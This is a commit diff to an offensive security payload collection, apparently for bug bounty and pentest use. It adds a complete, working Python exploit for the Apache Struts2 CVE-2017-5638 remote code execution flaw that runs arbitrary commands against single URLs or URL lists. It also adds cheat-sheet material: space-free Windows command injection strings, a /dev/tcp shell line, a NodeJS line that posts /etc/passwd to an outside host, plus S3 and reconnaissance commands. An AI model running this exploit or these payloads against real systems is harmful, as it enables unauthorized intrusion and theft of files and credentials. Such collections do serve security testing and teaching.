CVE Struts RCE + AWS ls + RCE spaceless Windows + Methodology updated

AWS Amazon Bucket S3/README.md

@@ -17,7 +17,12 @@ aws s3 mv test.txt s3://hackerone.files
 SUCCESS : "move: ./test.txt to s3://hackerone.files/test.txt"
 ```
 
-Bucket Finder
+Basic test
+```
+aws s3 ls s3://targetbucket
+```
+
+### Bucket Finder
 A cool tool that will search for readable buckets and list all the files in them. It can also be used to quickly find buckets that exist but deny access to listing files.
 ```
 wget https://digi.ninja/files/bucket_finder_1.1.tar.bz2 -O bucket_finder_1.1.tar.bz2
@@ -42,3 +47,4 @@ List of the top Alexa 100,000 sites with permutations on the TLD and www. For ex
 ## Thanks to
 * https://community.rapid7.com/community/infosec/blog/2013/03/27/1951-open-s3-buckets
 * https://digi.ninja/projects/bucket_finder.php
+* [Bug Bounty Survey - AWS Basic test](https://twitter.com/bugbsurveys/status/859389553211297792)

CVE Shellshock Heartbleed Struts2/Apache Struts2.py

@@ -0,0 +1,176 @@
+#!/usr/bin/env python3
+# coding=utf-8
+# *****************************************************
+# struts-pwn: Apache Struts CVE-2017-5638 Exploit
+# Author:
+# Mazin Ahmed <Mazin AT MazinAhmed DOT net>
+# This code is based on:
+# https://www.exploit-db.com/exploits/41570/
+# https://www.seebug.org/vuldb/ssvid-92746
+# *****************************************************
+import sys
+import random
+import requests
+import argparse
+
+# Disable SSL warnings
+try:
+    import requests.packages.urllib3
+    requests.packages.urllib3.disable_warnings()
+except:
+    pass
+
+if len(sys.argv) <= 1:
+    print('[*] CVE: 2017-5638 - Apache Struts2 S2-045')
+    print('[*] Struts-PWN - @mazen160')
+    print('\n%s -h for help.' % (sys.argv[0]))
+    exit(0)
+
+parser = argparse.ArgumentParser()
+parser.add_argument("-u", "--url",
+                    dest="url",
+                    help="Check a single URL.",
+                    action='store')
+parser.add_argument("-l", "--list",
+                    dest="usedlist",
+                    help="Check a list of URLs.",
+                    action='store')
+parser.add_argument("-c", "--cmd",
+                    dest="cmd",
+                    help="Command to execute. (Default: id)",
+                    action='store',
+                    default='id')
+parser.add_argument("--check",
+                    dest="do_check",
+                    help="Check if a target is vulnerable.",
+                    action='store_true')
+args = parser.parse_args()
+url = args.url if args.url else None
+usedlist = args.usedlist if args.usedlist else None
+url = args.url if args.url else None
+cmd = args.cmd if args.cmd else None
+do_check = args.do_check if args.do_check else None
+
+
+def url_prepare(url):
+    url = url.replace('#', '%23')
+    url = url.replace(' ', '%20')
+    if ('://' not in url):
+        url = str('http') + str('://') + str(url)
+    return(url)
+
+
+def exploit(url, cmd):
+    url = url_prepare(url)
+    print('\n[*] URL: %s' % (url))
+    print('[*] CMD: %s' % (cmd))
+
+    payload = "%{(#_='multipart/form-data')."
+    payload += "(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)."
+    payload += "(#_memberAccess?"
+    payload += "(#_memberAccess=#dm):"
+    payload += "((#container=#context['com.opensymphony.xwork2.ActionContext.container'])."
+    payload += "(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class))."
+    payload += "(#ognlUtil.getExcludedPackageNames().clear())."
+    payload += "(#ognlUtil.getExcludedClasses().clear())."
+    payload += "(#context.setMemberAccess(#dm))))."
+    payload += "(#cmd='%s')." % cmd
+    payload += "(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win')))."
+    payload += "(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd}))."
+    payload += "(#p=new java.lang.ProcessBuilder(#cmds))."
+    payload += "(#p.redirectErrorStream(true)).(#process=#p.start())."
+    payload += "(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream()))."
+    payload += "(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros))."
+    payload += "(#ros.flush())}"
+
+    headers = {
+        'User-Agent': 'struts-pwn (https://github.com/mazen160/struts-pwn)',
+        # 'User-Agent': 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36',
+        'Content-Type': str(payload),
+        'Accept': '*/*'
+    }
+
+    timeout = 3
+    try:
+        output = requests.get(url, headers=headers, verify=False, timeout=timeout, allow_redirects=False).text
+    except Exception as e:
+        print("EXCEPTION::::--> " + str(e))
+        output = 'ERROR'
+    return(output)
+
+
+def check(url):
+    url = url_prepare(url)
+    print('\n[*] URL: %s' % (url))
+
+    random_string = ''.join(random.choice('abcdefghijklmnopqrstuvwxyz') for i in range(7))
+
+    payload = "%{#context['com.opensymphony.xwork2.dispatcher.HttpServletResponse']."
+    payload += "addHeader('%s','%s')}.multipart/form-data" % (random_string, random_string)
+    headers = {
+        'User-Agent': 'struts-pwn (https://github.com/mazen160/struts-pwn)',
+        # 'User-Agent': 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36',
+        'Content-Type': str(payload),
+        'Accept': '*/*'
+    }
+
+    timeout = 3
+    try:
+        resp = requests.get(url, headers=headers, verify=False, timeout=timeout, allow_redirects=False)
+        if ((random_string in resp.headers.keys()) and (resp.headers[random_string] == random_string)):
+            result = True
+        else:
+            result = False
+    except Exception as e:
+        print("EXCEPTION::::--> " + str(e))
+        result = False
+    return(result)
+
+
+def main(url=url, usedlist=usedlist, cmd=cmd, do_check=do_check):
+    if url:
+        if do_check:
+            result = check(url)  # Only check for existence of Vulnerablity
+            output = '[*] Status: '
+            if result is True:
+                output += 'Vulnerable!'
+            else:
+                output += 'Not Affected.'
+        else:
+            output = exploit(url, cmd)  # Exploit
+        print(output)
+
+    if usedlist:
+        URLs_List = []
+        try:
+            f_file = open(str(usedlist), 'r')
+            URLs_List = f_file.read().replace('\r', '').split('\n')
+            try:
+                URLs_List.remove('')
+            except ValueError:
+                pass
+                f_file.close()
+        except:
+            print('Error: There was an error in reading list file.')
+            exit(1)
+        for url in URLs_List:
+            if do_check:
+                result = check(url)  # Only check for existence of Vulnerablity
+                output = '[*] Status: '
+                if result is True:
+                    output += 'Vulnerable!'
+                else:
+                    output += 'Not Affected.'
+            else:
+                output = exploit(url, cmd)  # Exploit
+            print(output)
+
+    print('[%] Done.')
+
+if __name__ == '__main__':
+    try:
+        main(url=url, usedlist=usedlist, cmd=cmd, do_check=do_check)
+    except KeyboardInterrupt:
+        print('\nKeyboardInterrupt Detected.')
+        print('Exiting...')
+        exit(0)

CVE Shellshock Heartbleed Struts2/README.md

@@ -1,13 +1,16 @@
 # Common Vulnerabilities and Exposures
-Big CVEs in the last 5 years.	
+Big CVEs in the last 5 years.
 
-## Heartbleed
+## CVE-2014-0160 - Heartbleed
 The Heartbleed Bug is a serious vulnerability in the popular OpenSSL cryptographic software library. This weakness allows stealing the information protected, under normal conditions, by the SSL/TLS encryption used to secure the Internet. SSL/TLS provides communication security and privacy over the Internet for applications such as web, email, instant messaging (IM) and some virtual private networks (VPNs).
 
-## Shellshock
+## CVE-2014-6271 - Shellshock
 Shellshock, also known as Bashdoor is a family of security bug in the widely used Unix Bash shell, the first of which was disclosed on 24 September 2014. Many Internet-facing services, such as some web server deployments, use Bash to process certain requests, allowing an attacker to cause vulnerable versions of Bash to execute arbitrary commands. This can allow an attacker to gain unauthorized access to a computer system.
 
+## CVE-2017-5638 - Apache Struts 2
+On March 6th, a new remote code execution (RCE) vulnerability in Apache Struts 2 was made public. This recent vulnerability, CVE-2017-5638, allows a remote attacker to inject operating system commands into a web application through the “Content-Type” header.
 
 ## Thanks to
 * http://heartbleed.com
 * https://en.wikipedia.org/wiki/Shellshock_(software_bug)
+* [Imperva Apache Struts analysis](https://www.imperva.com/blog/2017/03/cve-2017-5638-new-remote-code-execution-rce-vulnerability-in-apache-struts-2/)

Methodology_and_enumeration.md

@@ -15,13 +15,16 @@ git clone https://github.com/danielmiessler/SecLists.git
 knockpy domain.com -w subdomains-top1mil-110000.txt
 ```
 
-* Using Google Dorks
+* Using Google Dorks and Google Transparency Report
 ```bash
 site:*.domain.com -www
 site:http://domain.com filetype:pdf
 site:http://domain.com inurl:&
 site:http://domain.com inurl:login,register,upload,logout,redirect,redir,goto,admin
 site:http://domain.com ext:php,asp,aspx,jsp,jspa,txt,swf
+
+You need to include subdomains ;)
+https://www.google.com/transparencyreport/https/ct/?hl=en-US#domain=[DOMAIN]g&incl_exp=true&incl_sub=true
 ```
 
 * Subdomain take over using HostileSubBruteForcer

Remote commands execution/README.md

@@ -1,14 +1,14 @@
 # Remote Code Execution
 Remote code execution is a security vulnerability that allows an attacker to execute codes from a remote server.
-	
+
 
 ## Exploits
 Normal code execution, execute the command and voila :p
 ```
-cat /etc/passwd 
-root:x:0:0:root:/root:/bin/bash 
-daemon:x:1:1:daemon:/usr/sbin:/bin/sh 
-bin:x:2:2:bin:/bin:/bin/sh 
+cat /etc/passwd
+root:x:0:0:root:/root:/bin/bash
+daemon:x:1:1:daemon:/usr/sbin:/bin/sh
+bin:x:2:2:bin:/bin:/bin/sh
 sys:x:3:3:sys:/dev:/bin/sh
 ```
 
@@ -19,7 +19,7 @@ original_cmd_by_server && ls
 original_cmd_by_server | ls
 ```
 
-Code execution without space
+Code execution without space - Linux
 ```
 swissky@crashlab▸ ~ ▸ $ {cat,/etc/passwd}
 root:x:0:0:root:/root:/bin/bash
@@ -40,6 +40,12 @@ Linux crashlab 4.4.X-XX-generic #72-Ubuntu
 swissky@crashlab▸ ~ ▸ $ sh</dev/tcp/127.0.0.1/4242
 ```
 
+Code execution without space - Windows
+```
+ping%CommonProgramFiles:~10,-18%IP
+ping%PROGRAMFILES:~10,-5%IP
+```
+
 ## Time based data exfiltration
 Extracting data : char by char
 ```
@@ -54,7 +60,7 @@ user	0m0.000s
 sys	0m0.000s
 ```
 
-## Environment based 
+## Environment based
 NodeJS Code execution
 ```
 require('child_process').exec('wget --post-data+"x=$(cat /etc/passwd)"+HOST')
@@ -62,3 +68,4 @@ require('child_process').exec('wget --post-data+"x=$(cat /etc/passwd)"+HOST')
 
 ## Thanks to
 * [SECURITY CAFÉ - Exploiting Timed Based RCE](https://securitycafe.ro/2017/02/28/time-based-data-exfiltration/)
+* [Bug Bounty Survey - Windows RCE spaceless](https://twitter.com/bugbsurveys/status/860102244171227136)